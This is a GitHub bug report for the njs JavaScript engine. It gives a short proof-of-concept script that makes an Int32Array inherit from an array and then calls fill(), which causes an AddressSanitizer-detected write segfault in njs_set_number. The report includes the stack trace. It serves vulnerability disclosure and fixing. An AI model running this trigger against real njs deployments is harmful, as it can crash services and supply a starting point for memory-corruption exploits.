
SEGV src/njs_value.h in njs_set_number #478

Closed
xmzyshypnc opened this issue Mar 1, 2022 · 1 comment

xmzyshypnc commented Mar 1, 2022

Environment

OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :

```sh
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
```

PoC

```javascript
function main() {
    var arr_32 = new Int32Array(1);
    var arr_1 = [1];
    arr_32.__proto__ = arr_1;

    var arr_fill = arr_32.fill();

    var func = `
        async function test() {
        }
    `;
}
main();
```

Stack dump

```
AddressSanitizer:DEADLYSIGNAL

==781315==ERROR: AddressSanitizer: SEGV on unknown address 0x555e3b24caa8 (pc 0x555e3b1e5058 bp 0x7fffe5a62250 sp 0x7fffe5a62180 T0)
==781315==The signal is caused by a WRITE memory access.
    #0 0x555e3b1e5057 in njs_set_number src/njs_value.h
    #1 0x555e3b1e5057 in njs_typed_array_set_value src/njs_typed_array.c:705
    #2 0x555e3b0d7ba6 in njs_value_property_set src/njs_value.c
    #3 0x555e3b1235af in njs_value_property_i64_set src/njs_value.h:1098
    #4 0x555e3b1235af in njs_array_prototype_fill src/njs_array.c:1885
    #5 0x555e3b13d61c in njs_function_native_call src/njs_function.c:739
    #6 0x555e3b0e30fb in njs_vmcode_interpreter src/njs_vmcode.c:788
    #7 0x555e3b13caba in njs_function_lambda_call src/njs_function.c:703
    #8 0x555e3b0e30fb in njs_vmcode_interpreter src/njs_vmcode.c:788
    #9 0x555e3b0dd0ba in njs_vm_start src/njs_vm.c:553
    #10 0x555e3b0c63f8 in njs_process_script src/njs_shell.c:890
    #11 0x555e3b0c6ebf in njs_process_file src/njs_shell.c:619
    #12 0x555e3b0c821f in main src/njs_shell.c:303
    #13 0x7f339244b082 in __libc_start_main ../csu/libc-start.c:308
    #14 0x555e3b0c3c4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_value.h in njs_set_number
==781315==ABORTING
```

Credit

xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)


Cook1eBB commented Mar 1, 2022